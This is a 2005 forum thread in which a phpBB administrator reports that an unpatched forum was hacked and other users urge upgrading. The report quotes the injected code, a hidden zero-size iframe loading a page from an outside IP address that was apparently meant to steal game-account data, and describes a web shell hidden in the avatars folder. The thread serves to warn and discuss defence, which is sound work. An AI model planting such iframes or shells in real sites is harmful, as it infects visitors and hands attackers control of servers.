[被駭]又被駭了!

文章由 **jawa560** » 2005-03-20 02:09

版本phpBB2.06
侵入方式:
修改版面分區內容，植入\r

<iframe src="http://210.51.23.7/help.htm" name="zhu" width="0" height="0" frameborder="0"></iframe>

應該是盜取天堂資料的木馬，真是可惡，看來不升級是不行了!

攔截畫面如下：

文章由 **jawa560** » 2005-03-20 02:54

剛剛又發現大頭照的資料夾裡(images/avatars)，發現了一隻木馬程式
._admin.php

XD，竟是一隻類似telnet的程式，原名應該叫myshell, 帳號密碼對了，就可以直接對主機下系統指令! 大家趕快查一查!

文章由 **jawa560** » 2005-03-20 02:57

恭請站長是否可新增一個駭客通報區，這樣大家才能即時防護自己的系統!

文章由 **design** » 2005-03-20 03:16

jawa560 寫:版本phpBB2.06

連安全性升級都不在乎的

新增駭客通報區有用嗎

文章由 **jawa560** » 2005-03-20 03:43

樓上的大哥,很多人並不是有那麼多時間可以專心在維護論壇的，而且別人加了多少外掛而導致升級困難的狀況，也不一而足，所以這樣講並不太公平！

文章由 **aHfUi** » 2005-03-20 04:32

那么你要花1点点时间来升级
还是一直给人家HACK @@?

文章由 **jawa560** » 2005-03-20 05:28

有沒有空升級，或升級有沒有困難是一回事，駭客事件有沒有收集的價值是另一回事。不過，還是很感謝大家的意見!

文章由 **kororinfo** » 2005-03-20 10:16

有沒有通報.到最後還是要升級吧

文章由 **黑風凱特** » 2005-03-20 12:42

不升級安全性更新...

你的站台剛好可以給新手hacker練習用....

快快更新吧....

要不了多少時間的~

文章由 **Mac** » 2005-03-20 13:59

jawa560 寫:樓上的大哥,很多人並不是有那麼多時間可以專心在維護論壇的，而且別人加了多少外掛而導致升級困難的狀況，也不一而足，所以這樣講並不太公平！

你的邏輯有問題吧？既然沒空維護論壇，那被駭了要怪誰呢？
既然都已經有『公告區』要大家升級 phpBB 都沒用了，你認為『駭客通報區』的成效有多少？

~Mac

文章由 **jawa560** » 2005-03-20 14:30

對不起,混亂大家的思考了!
我要說的是,被駭是我家的事,我自會解決. 但我希望有駭客事件通報區.
政府雖然可發公報,但五花八門的新聞播報仍然有其收視率!

文章由 **godbless** » 2005-03-20 14:34

jawa560 寫:那意思就是說,只要政府有發公報,五花八門的新聞播報就沒價值了?

有宣傳價值...

其實有很多時候都是媒體先發播報，然後政府才發公報的...

文章由 **design** » 2005-03-20 20:45

有安全性更新通知的時候就是有用戶被駭的時後,
這樣還需要什麼駭客通報區?

就拿 phpbb 2.12 來說吧.
http://www.nsfocus.net/index.php?act=se ... ug_id=7464

到處都可以取得C的原始碼或有心人編譯過的工具\r
被駭的情況都一模一樣.

況且竹貓在這個漏洞出來也發了會員通知信
這樣還被駭, 然後再來通報, 不覺得問題是出在自己身上嗎?

文章由 **haw** » 2005-03-20 21:03

自己不做好論壇的維護
有在多的通報\r
你也只能知道自己即將被哪種木馬hack罷了

升級也不過花個十幾二十分鐘
我想絕對比你去查,去解,去知道那些hack跟木馬還快吧?

思考方向偏差真的頗大喔!

文章由 **oscerropper** » 2005-03-21 11:33

更新是為自己的論壇系統安全，等你被駭後就得不嘗失，我相信你的作業系統也會定期更新吧

竹貓星球

[被駭]又被駭了!

[被駭]又被駭了!

Re: [被駭]又被駭了!